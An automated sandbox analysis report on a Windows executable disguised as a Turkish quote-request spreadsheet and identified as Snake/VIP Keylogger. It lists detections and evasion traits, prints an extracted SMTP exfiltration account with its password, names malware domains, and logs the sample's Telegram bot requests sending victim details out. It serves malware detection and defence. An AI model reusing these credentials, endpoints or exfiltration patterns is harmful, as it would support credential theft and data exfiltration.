Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Overview

General Information

Sample name: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
renamed because original name is a hash value
Original sample name: TEKLF TALEP VE FYAT TEKLF_xlsx.exe
Analysis ID: 1528049
MD5: 2cc0d4388df2a7acfae0a9dc3cceb3b5
SHA1: 63918ef85e4ee9d01edd4c0304e6f9682f90ee00
SHA256: c3bc0f624964efbdb410648c80ed1357b28f293ce0d0c7602fcae852e37ad918
Tags: exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Found malware configuration
Source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe ReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe ReversingLabs: Detection: 52%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49729 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49768 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49788 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49871 version: TLS 1.2
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vamE.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr
Source: Binary string: vamE.pdbSHA256 source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 0133F8E9h 9_2_0133F631
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 4x nop then jmp 0133FD41h 9_2_0133FA88
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 012BF8E9h 14_2_012BF631
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 012BFD41h 14_2_012BFA88
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 059264E0h 14_2_059261E8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05925066h 14_2_05924D98
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05923076h 14_2_05922DA8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 059210BEh 14_2_05920DF0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05927800h 14_2_05927508
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592EF88h 14_2_0592EC90
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05922756h 14_2_05922488
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592D7A0h 14_2_0592D4A8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592079Eh 14_2_059204D0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592A7D0h 14_2_0592A4D8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592BFB8h 14_2_0592BCC0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05928FE8h 14_2_05928CF0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05924747h 14_2_05924478
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592EAC0h 14_2_0592E7C8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 059222C6h 14_2_05921FF8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592BAF0h 14_2_0592B7F8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592D2D8h 14_2_0592CFE0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 059242B6h 14_2_05923FE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 059219B7h 14_2_05921710
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05928190h 14_2_05927E98
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05929978h 14_2_05929680
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 059269A8h 14_2_059266B0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05925986h 14_2_059256B8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05923996h 14_2_059236C8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592E130h 14_2_0592DE38
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592F918h 14_2_0592F620
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592C948h 14_2_0592C650
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592B160h 14_2_0592AE68
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592C480h 14_2_0592C188
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 059294B0h 14_2_059291B8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592AC98h 14_2_0592A9A0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05927CC8h 14_2_059279D0
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05922BE6h 14_2_05922918
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05924BD6h 14_2_05924908
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592F450h 14_2_0592F158
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592DC68h 14_2_0592D970
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05920C2Eh 14_2_05920960
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592A308h 14_2_0592A010
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05928B20h 14_2_05928828
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592030Eh 14_2_05920040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05927338h 14_2_05927040
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592CE10h 14_2_0592CB18
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592E5F8h 14_2_0592E300
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592B628h 14_2_0592B330
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05923E26h 14_2_05923B58
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05925EB7h 14_2_05925B48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05929E40h 14_2_05929B48
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05926E70h 14_2_05926B78
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05928658h 14_2_05928360
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05921E36h 14_2_05921B68
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592154Eh 14_2_05921280
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 0592FDE0h 14_2_0592FAE8
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 05923506h 14_2_05923238
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Code function: 4x nop then jmp 059254F6h 14_2_05925228

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49744 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49783 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49758 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49796 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49722 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49775 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49740 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49812 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49776 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49800 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49798 -> 188.114.96.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49729 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49768 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49788 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
